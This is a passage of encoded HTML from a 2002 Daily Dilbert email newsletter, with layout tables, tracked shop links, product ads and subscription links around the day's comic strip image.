 media.com:80/Click?q=3Dbd-c0dUQ7pwt1G-JtDpAjVH0WbAg9RR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/dilbert_tshirt_120x60.gi=
 f" WIDTH=3D"120" HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Shop Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"627" HEIGHT=3D"10" COLSPAN=3D"4"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"627" HEIG=
 HT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- AD TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- HEADER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"515" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dd2-THH_QUL=
 ylG-qAPt3Ge2S5G1mkRRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/dai=
 ly_dilbert/images/daily_dilbert_header_left.gif" WIDTH=3D"515" HEIGHT=3D"76=
 " BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_top=
 .gif" WIDTH=3D"90" HEIGHT=3D"55" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"5" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert=
 _header_right.gif" WIDTH=3D"5" HEIGHT=3D"76" BORDER=3D"0" ALT=3D"Daily Dilb=
 ert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" ROWSPAN=3D"3"&gt;&lt;IMG SRC=3D"http://www.comics=
 .com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=3D"10" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09&lt;!-- ENTER DATE HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#003366" HEIGHT=3D"13"&gt;&lt;FONT FAC=
 E=3D"helvetica, arial" SIZE=3D"1" COLOR=3D"#FFFFFF"&gt;&lt;B&gt;07/22/2002&lt;/B&gt;&lt;/FONT=
 &gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_bot=
 tom.gif" WIDTH=3D"90" HEIGHT=3D"8" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- HEADER TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"2" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEI=
 GHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/daily_dilbert/images/white_line_right=
 .gif" WIDTH=3D"4" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"48" ROWSPAN=3D"4"&gt;&lt;IMG SRC=3D"htt=
 p://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=
 =3D"48" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"37" BGCOLOR=3D"#003366" ROWSPAN=3D=
 "2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"1" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"5" BGCOLOR=3D"#FFCC66" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"37" BACKGROUND=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/ffcc66_right.gif" ROWSPAN=3D"2"&gt;&lt;=
 IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=
 =3D"4" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10"=
  HEIGHT=3D"32" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"595" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;Hi Justin, enjoy your daily comic from &lt;A t=
 arget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D26-KqZ=
 VIiMmfen0wkuBBNk-Z1dXjsRR"&gt;Dilbert.com&lt;/A&gt;.&lt;BR&gt;&lt;B&gt;If you like the Daily Dil=
 bert, tell a friend! &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedi=
 a.com:80/Click?q=3D50-M_6BIR0rscVrAP6AS5nxjtaOIRRR"&gt;Click here to send mail=
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"7" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"605=
 " HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"7" BACKGROUND=3D"http://www.comics=
 .com/comics/dilbert/daily_dilbert/images/ffffff_right.gif"&gt;&lt;IMG SRC=3D"http=
 ://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#003366" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"6" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"6" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"19" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/image=
 s/header_online_store.gif" WIDTH=3D"200" HEIGHT=3D"15" BORDER=3D"0" ALT=3D"=
 "&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif=
 " WIDTH=3D"4" HEIGHT=3D"4" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"9" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"9" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BACKGROUND=3D"http://www.comi=
 cs.com/comics/dilbert/daily_dilbert/images/white_line_right.gif" ROWSPAN=3D=
 "6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"349" ROWSPAN=3D"7"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGH=
 T=3D"349" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"200" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/books.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Books"&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://umm=
 ail4.unitedmedia.com:80/Click?q=3D7b-pr__IBZJOdmuohkbDP4-2IYuZ9RR"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/ads/book_badge.gif" WIDTH=3D"169" =
 HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Another Day in Cubicle Paradise"&gt;&lt;/A&gt;&lt;BR&gt;=
 &lt;BR&gt;Complete your collection while pretending to work!&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D90=
 -wHPMQ_I0CTqo6lgVbLHjZmegJsRR"&gt;&gt; Shop&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"83" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click=
 ?q=3Da5-DytHQ7ZlGfUVQDgsIM181IEqw9RR"&gt;&lt;IMG SRC=3D"http://www.comics.com/com=
 ics/dilbert/daily_dilbert/images/thumb_dilbert_mints.gif" WIDTH=3D"83" HEIG=
 HT=3D"57" BORDER=3D"0" ALT=3D"Dilbert Mints"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/mints.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Graphic (live connection required)"&gt;&lt;BR&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"120=
 " HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;They're character-shaped, in colle=
 ctible tins.&lt;BR&gt;&lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedm=
 edia.com:80/Click?q=3Dba-m-95QXpzFQ1YXShxh5mplZKnWRRR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;=
 /TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"162" HEIGHT=3D"24" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/clothing_and_posters.gif" WIDTH=
 =3D"121" HEIGHT=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;Get any Dilbert strip publ=
 ished in the last 90 days printed on a&lt;BR&gt;T-shirt, sweatshirt or poster. Se=
 lected older strips are also available.&lt;BR&gt;
 &lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Clic=
 k?q=3Dcf-eb0-QLwAhtSBMhVJa4lpgvcSoRRR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDT=
 H=3D"148" HEIGHT=3D"20" BORDER=3D"0" ALT=3D""&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09&lt;TD WIDTH=3D"14" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"=
 http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.gif" WIDTH=
 =3D"14" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"148" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3De4-AB7FQVkZaEo8v8NI8muPWXTR9dRR"&gt;View all pro=
 ducts&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"5" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"585" HEIGHT=3D"5" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;!-- COMIC STRIP HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
                 &lt;TD ALIGN=3D"LEFT" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT face=3D"helvet=
 ica, arial" size=3D1&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily=
 _dilbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0=
 "&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D=
 f9-mtITQxOZLWiaxbKSMfs3MbfwfsRR"&gt;Modify Your Account&lt;/A&gt;/&lt;A target=3D"_blan=
 k" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D0e--eDTIiQKhAcKSBS4r=
 LdEHR-t69RR"&gt;Unsubscribe&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=3D"RIGHT" BGCOLOR=3D"#FFF=
 FFF" COLSPAN=3D"7"&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A target=3D"=
 _blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D23-sFrGINMN0Cda=
 nqtiAg2jtuP2j9RR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_di=
 lbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;B=
 uy This Strip&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A HREF=3D"http://www.comics.com/webmail=
 /SendAStrip?AppName=3DSendAStrip&amp;ComicName=3D/comics/dilbert/&amp;Attachments=
 =3D/comics/dilbert/archive/images/dilbert21044880020722.gif&amp;EmailDate=3DJul=
 y-22-2002"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/i=
 mages/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Send Thi=
 s Strip to a Friend&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A target=3D"_blank" HREF=3D"http:=
 //ummail4.unitedmedia.com:80/Click?q=3D39-7QkMIjIRy-V4FhwCG8sqVN4ecdRR"&gt;&lt;IM=
 G SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.g=
 if" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Month of Dilbert&lt;/A&gt;&amp;n=
 bsp;&amp;nbsp;&lt;/FONT&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
                 &lt;TD ALIGN=3D"LEFT" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"10"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D4e-0Y45=
 InZ24uhyiaLIKes901j9nsRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/=
 archive/images/dilbert21044880020722.gif" BORDER=3D"0" ALT=3D"You need to g=
 o online to see today's strip and other cool features on the Daily Dilbert.=
 "&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot=
 .gif" WIDTH=3D"600" HEIGHT=3D"8" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- FOOTER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"610" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" HEIGHT=3D"1" BGCOLOR=3D"#003366" COLSPAN=
 =3D"8"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"610" HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"4" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"478" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"478" HEIGHT=3D"4"=
  BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D63-tPIj=
 IHW5satqyWTg_s-ssJL9E9RR"&gt;Unsubscribe&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"ht=
 tp://ummail4.unitedmedia.com:80/Click?q=3D78-d5tsIdUgx-AEEqF5viMd-qmfZRRR"&gt;=
 Modify Your Subscription&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"http://ummail4.=
 unitedmedia.com:80/Click?q=3D8d-nbp1Q7nx54QDghgIikuIXxa-L9RR"&gt;Request a New=
  Subscription&lt;/A&gt; | &lt;a href=3D"mailto:dilberthelp@unitedmedia.com"&gt;Report S=
 ubscription Problems&lt;/A&gt;&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Da2=
 -6-07QXZoTvqtY-E9R6C1DQolgRRR"&gt;Subscribe to the Dilbert Newsletter/Join Dog=
 bert's New Ruling Class&lt;/A&gt; |&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Db7=
 -FOkPQ8JogOFk1qp0N-bWBXqWPdRR"&gt;Dilbert on Your Site/Intranet&lt;/A&gt; | &lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dcc-h4hQQ0O=
 YtVqCCqW7qlZmmgdcodRR"&gt;Advertising Info&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"=
 http://ummail4.unitedmedia.com:80/Click?q=3De1-6RSNQxkAWvxmwxFPh9YLA-VXvsRR=
 "&gt;Dilbert in Your Publication&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"45" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"45" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"62" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"62" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3Df6-QkaIQMwXDgQCLAXYYdGxFRTBe9RR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/comics_com_logo.gif" WID=
 TH=3D"62" HEIGHT=3D"42" BORDER=3D"0" ALT=3D"Comics.com"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" BACKGROUND=3D"http://www.comics.com/comics/d=
 ilbert/daily_dilbert/images/white_line_right.gif"&gt;&lt;IMG SRC=3D"http://www.co=
 mics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" HEIGHT=3D"4" BORD=
 ER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" COLSPAN=3D"8"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/daily_dilbert_footer.gif" WIDTH=
 =3D"610" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- FOOTER TABLE END --&gt;
 =09=09=09
 =09=09&lt;/TD&gt;
 =09=09&lt;TD&gt;
 =09=09
 =09=09=09
 =09=09
 =09=09=09&lt;!-- SKYSCRAPER TABLE BEGIN --&gt;
 =09=09=09&lt;table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" height=3D"=
 600"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/=
 small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" BORDER=3D"0" ALT=3D"Advertisement"=
 &gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif"=
  WIDTH=3D"2" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;a href=3D"http://www.partner2profit.com/redir.cfm?ccode=
 =3D1D74C2EA&amp;pcode=3DEF39755C" target=3D"_blank"&gt;&lt;img src=3D"http://www.flow=
 go.com/images/bt/p2p.gif?ccode=3D1D74C2EA&amp;pcode=3DEF39755C" width=3D120 hei=
